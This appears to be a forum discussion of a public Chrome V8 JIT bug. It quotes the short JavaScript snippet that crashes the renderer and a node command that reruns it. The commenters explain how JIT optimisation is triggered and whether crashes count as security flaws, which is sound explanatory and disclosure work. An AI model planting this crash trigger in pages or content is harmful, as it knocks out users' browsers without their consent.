Web page that crashes the Chrome renderer
ronsor.github.io
ronsor.github.io
<!-- JavaScript is cursed
CREDIT: https://bugs.chromium.org/p/chromium/issues/detail?id=1195650&q=component%3ABlink%3EJavaScript%3ECompiler&can=1 -->
<script>z=(a)=>{let y = Math.min(Infinity ? [] : Infinity, -0) / 0; if (a) y = -0; return y ? 1 : 0}; z(false); for (let i = 0; i < 0x10000; ++i) z(false);</script>
<!-- another day, another JIT bug -->Also, a crash isn't as bad as it appears. Most of the time it's not a security vulnerability. It is only when it involves buffer overrun and the like. They are indeed annoying when you have it in real sites though.
> Around 70% of our high severity security bugs are memory unsafety problems (that is, mistakes with C/C++ pointers). Half of those are use-after-free bugs.
https://www.chromium.org/Home/chromium-security/memory-safet...
I cleaned up the javascript a bit by adding whitespace and more meaningful variable names:
https://gist.github.com/mdesson/b87c51ff4caf7bd4d2f74b52e8d6...
1. Why is there a ternary on the condition that Infinify is truthy ? My instinct is to say that it will always return [], which brings my second point
2. Why is it always using false as an argument ? What is the effect of this on the execution versus just hardcoding it ?
Correct. Only functions that are called often will get optimized.
node --print-bytecode --eval "z=(a)=>{let y = Math.min(Infinity ? [] : Infinity, -0) / 0; if (a) y = -0; return y ? 1 : 0}; z(false); for (let i = 0; i < 0x10000; ++i) z(false);"
[1] https://bugs.chromium.org/p/chromium/issues/detail?id=119565...
[2] https://bugs.chromium.org/p/project-zero/issues/detail?id=17...
It certainly tried to render it though.
Produced a lively discussion on how to fix it.
Firefox, pre-Chromium Opera and every other browser that isn't derived from Chrome --- including those that plain don't support JS at all --- are unaffected too.
This is a good example for why browser diversity is a good thing.
I still think it is, I still use script blockers all the time, and I still think that a webpage that doesn't display anything with scripts disabled is seriously broken.